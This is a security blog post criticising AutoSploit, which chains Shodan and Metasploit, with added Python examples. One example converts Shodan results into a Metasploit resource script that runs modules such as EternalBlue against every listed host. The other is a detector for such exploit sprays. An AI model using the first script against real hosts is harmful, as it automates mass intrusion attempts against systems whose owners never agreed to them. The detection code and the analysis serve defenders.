AutoSploit: The Collapse of Threat Modeling

Our world has always had “script kiddies”: beginner hackers with no real purpose or agenda who use publicly available automated tools for easy attacks. Normally those attacks are easily found and prevented, but last week they got the equivalent of weapons of mass destruction. For years, the barrier to entry to a career in vulnerability assessment and penetration testing was knowing how to use the advanced tools; AutoSploit removes that barrier by chaining several of those tools together and automating the attack from beginning to end.

AutoSploit is open source, written in Python, and leverages both Shodan, the internet scanning engine, and Metasploit, the open source exploit framework. The program runs Shodan search queries and drops the resulting IP addresses into a text file. That file is picked up by the Metasploit stage, which lets the user select specific vulnerabilities to target or choose the “Hail Mary” option, which throws every available exploit at every target. Basically, it’s a mass-attack tool with text-based targeting.
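As an added illustration (not code from AutoSploit itself), here is the pipeline the paragraph describes: a Shodan-style search result is reduced to a host list, and that list is rendered into a Metasploit resource script of the kind `msfconsole -r` consumes. The Shodan result below is a constructed sample shaped like the JSON the search API returns (a `matches` list with an `ip_str` per banner); the module list is a constructed two-entry sample using real Metasploit module names only so the output looks like a genuine resource script. Nothing here contacts Shodan or runs Metasploit.

```python
"""Shodan result -> host list -> Metasploit resource script.

Added example, not AutoSploit's own code. The input is a constructed
Shodan-style JSON document; no network access is performed.
"""
import ipaddress
import json

# Constructed sample shaped like a Shodan search response. Addresses come from
# the RFC 5737 documentation ranges; nothing was actually scanned.
SAMPLE_SHODAN_RESULT = json.dumps({
    "total": 4,
    "matches": [
        {"ip_str": "203.0.113.10", "port": 445, "product": "Samba"},
        {"ip_str": "203.0.113.10", "port": 139, "product": "Samba"},  # same host, 2nd banner
        {"ip_str": "198.51.100.22", "port": 445, "product": "Samba"},
        {"ip_str": "not-an-ip", "port": 445},                           # malformed entry
    ],
})

# Constructed module list. Both names are real Metasploit modules; the first is
# a harmless version scanner, the second an exploit, so the list shows the
# difference between "pick one module" and "run everything".
SAMPLE_MODULES = [
    "auxiliary/scanner/smb/smb_version",
    "exploit/windows/smb/ms17_010_eternalblue",
]


def extract_hosts(shodan_json: str) -> list:
    """Return the unique, valid IP addresses in a Shodan search result, sorted.

    This is the "drop their IPs into a text file" step of the post: the same
    host can appear once per banner, and Shodan entries are not guaranteed to
    be well-formed, so we deduplicate and validate before targeting.
    """
    hosts = set()
    for match in json.loads(shodan_json).get("matches", []):
        try:
            hosts.add(str(ipaddress.ip_address(match.get("ip_str"))))
        except ValueError:
            continue  # skip anything that is not a usable address
    return sorted(hosts, key=ipaddress.ip_address)


def build_resource_script(hosts: list, modules: list, rport: int = 445) -> str:
    """Render an msfconsole resource (.rc) script running every module in
    `modules` against every host in `hosts`.

    Passing the full module list is the "Hail Mary" behaviour the post
    describes; passing a one-element list is the targeted mode. RHOSTS accepts
    a space-separated list, so the whole host file collapses into one line.
    """
    lines = []
    for module in modules:
        lines.append(f"use {module}")
        lines.append(f"set RHOSTS {' '.join(hosts)}")
        lines.append(f"set RPORT {rport}")
        lines.append("run")
    lines.append("exit")
    return "\n".join(lines) + "\n"


def attempt_count(hosts: list, modules: list) -> int:
    """Number of module-against-host runs the script will perform; this is the
    volume of noise a defender gets to see."""
    return len(hosts) * len(modules)


if __name__ == "__main__":
    targets = extract_hosts(SAMPLE_SHODAN_RESULT)
    print(build_resource_script(targets, SAMPLE_MODULES))
    print(f"# {attempt_count(targets, SAMPLE_MODULES)} attempts queued")
```

The interesting part is how little is here: the tool's value is entirely in the two services it glues together, which is why the post's later point about the code itself being unremarkable holds.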

As security professionals, we spend hundreds of hours per year creating very specific threat models: how attacks are facilitated, how we respond to them, and how we prevent those holes from opening in our environments. AutoSploit takes that whole playbook and tosses it in favor of brute-force, open-source attacks. For decades there has been a chess game between attackers and defenders: the attackers try to gain access to the network as quietly as possible, and the defenders try to detect and stop them. There is no sense of stealth with AutoSploit. Using the “Hail Mary” option, as almost all inexperienced attackers will, sets off all kinds of alarms in the environment.
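To make the “no stealth” point concrete, here is an added example (not from the post) of the kind of detection that catches a Hail Mary run: a single source address generating alerts for many distinct exploit signatures, ports and targets within a short window. The log lines, their `key=value` format and the signature names are constructed for this example; a real IDS or SIEM rule would key on the same fields (source, destination, port, signature, timestamp).

```python
"""Flag sources that spray many distinct exploit attempts in a short window.

Added example, not from the post. Log format and signature names are
constructed; addresses are from documentation ranges.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed IDS-style alert log. 203.0.113.5 behaves like a Hail Mary run,
# 203.0.113.9 is a single probe, 203.0.113.77 is slow and patient.
SAMPLE_LOG = """\
2018-02-01T10:00:01Z src=203.0.113.5 dst=198.51.100.7 dport=445 sig=smb_exploit_attempt
2018-02-01T10:00:02Z src=203.0.113.5 dst=198.51.100.7 dport=445 sig=smb_exploit_attempt_2
2018-02-01T10:00:04Z src=203.0.113.5 dst=198.51.100.7 dport=80 sig=http_exploit_attempt
2018-02-01T10:00:05Z src=203.0.113.5 dst=198.51.100.7 dport=80 sig=http_exploit_attempt_2
2018-02-01T10:00:07Z src=203.0.113.5 dst=198.51.100.7 dport=22 sig=ssh_exploit_attempt
2018-02-01T10:00:09Z src=203.0.113.5 dst=198.51.100.7 dport=3389 sig=rdp_exploit_attempt
2018-02-01T10:00:11Z src=203.0.113.5 dst=198.51.100.8 dport=445 sig=smb_exploit_attempt
2018-02-01T10:00:03Z src=203.0.113.9 dst=198.51.100.7 dport=443 sig=http_exploit_attempt
2018-02-01T08:00:00Z src=203.0.113.77 dst=198.51.100.7 dport=445 sig=smb_exploit_attempt
2018-02-01T09:30:00Z src=203.0.113.77 dst=198.51.100.7 dport=80 sig=http_exploit_attempt
2018-02-01T11:15:00Z src=203.0.113.77 dst=198.51.100.7 dport=22 sig=ssh_exploit_attempt
this line is garbage and must be skipped, not crash the detector
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) sig=(?P<sig>\S+)$"
)


def parse(log: str) -> list:
    """Parse alert lines into (timestamp, src, dst, dport, sig) tuples,
    silently dropping lines that do not match the constructed format."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append((ts, m["src"], m["dst"], int(m["dport"]), m["sig"]))
    return events


def max_distinct_in_window(events: list, window: timedelta) -> int:
    """For one source's events (sorted by time), return the largest number of
    distinct (dst, dport, sig) triples seen inside any window of length
    `window`. Distinct triples, not raw counts, so a retry loop against one
    port does not look like an exploit spray."""
    best = 0
    for i, (start, *_rest) in enumerate(events):
        seen = set()
        for ts, _src, dst, dport, sig in events[i:]:
            if ts - start > window:
                break
            seen.add((dst, dport, sig))
        best = max(best, len(seen))
    return best


def hail_mary_sources(log: str, window_seconds: int = 60, threshold: int = 5) -> dict:
    """Return {src: distinct_attempts} for every source that fired at least
    `threshold` distinct exploit attempts within `window_seconds`."""
    by_src = defaultdict(list)
    for event in parse(log):
        by_src[event[1]].append(event)
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for src, events in by_src.items():
        events.sort()
        score = max_distinct_in_window(events, window)
        if score >= threshold:
            flagged[src] = score
    return flagged


if __name__ == "__main__":
    for src, score in hail_mary_sources(SAMPLE_LOG).items():
        print(f"{src}: {score} distinct exploit attempts inside 60s")
```

The threshold and window are the knobs a defender tunes: widening the window to hours and lowering the threshold to three would also catch the slow source in the sample, at the cost of more review work, which is exactly the trade-off between noisy automated attackers and the quiet ones the post's chess game is about.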

The code itself isn’t particularly complex. It has just over 400 lines of Python, but most of that is API calls to Shodan and command-line calls to Metasploit. There are already scripts available that automate the same steps. The most telling detail is that the author(s) used both tabs and spaces for indentation, so it’s entirely possible the code was cherry-picked and copy/pasted from other sources.

This isn’t the first time this has happened. In 2003, the release of Metasploit caused outrage because security professionals thought it went too far. Now Metasploit is an important tool in our toolbox and is professionally supported by Rapid7. In 2009, the creation of Shodan started a new generation of internet scanning, and it now offers paid API support for high-volume queries.

Our carefully crafted threat models will be thrown out the window because some kids are bored and running Python scripts.
